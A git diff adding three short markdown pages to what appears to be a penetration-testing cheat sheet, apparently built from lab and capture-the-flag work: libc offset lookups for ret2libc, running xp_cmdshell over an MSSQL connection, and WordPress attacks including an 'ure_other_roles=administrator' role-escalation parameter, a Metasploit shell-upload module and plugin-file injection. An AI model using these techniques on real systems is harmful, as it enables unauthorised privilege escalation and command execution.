diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md
new file mode 100644
index 0000000..caf40c8
--- /dev/null
+++ b/exploit/binaries/ret2libc.md
@@ -0,0 +1,13 @@
+# Ret2libc
+
+
+## Finding offsets
+
+* On target find `sh` address inside libc
+```sh
+strings -a -t x /lib32/libc.so.6 | grep /bin/sh
+```
+* Sub from `system` address from inside libc
+```sh
+readelf -s /lib32/libc.so.6 | grep system
+```
diff --git a/exploit/sqli/mssql.md b/exploit/sqli/mssql.md
new file mode 100644
index 0000000..b175ec0
--- /dev/null
+++ b/exploit/sqli/mssql.md
@@ -0,0 +1,9 @@
+# MSSQL
+
+# Usage
+
+* `sqsh` as a shell
+* After connection is established check `xp_cmdshell'
+```sh
+xp_cmdshell 'whoami';
+```
diff --git a/exploit/web/wordpress.md b/exploit/web/wordpress.md
new file mode 100644
index 0000000..12a9d75
--- /dev/null
+++ b/exploit/web/wordpress.md
@@ -0,0 +1,22 @@
+# Wordpress
+
+## ure_user_roles
+
+* [exploitdb 44595](https://exploit-db.com/exploits/44595.)
+* [windsordeveloper](https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/)
+
+* Update user profile and append POST parameter to gain administrator role on user
+```sh
+&ure_other_roles=administrator
+```
+
+## Shell Upload
+
+* Msfconsole
+```sh
+exploit/unix/webapp/wp_admin_shell_upload
+```
+
+## Template & Plugin Editing
+
+* If template injection does not work, use plugin injection on `akismet.php`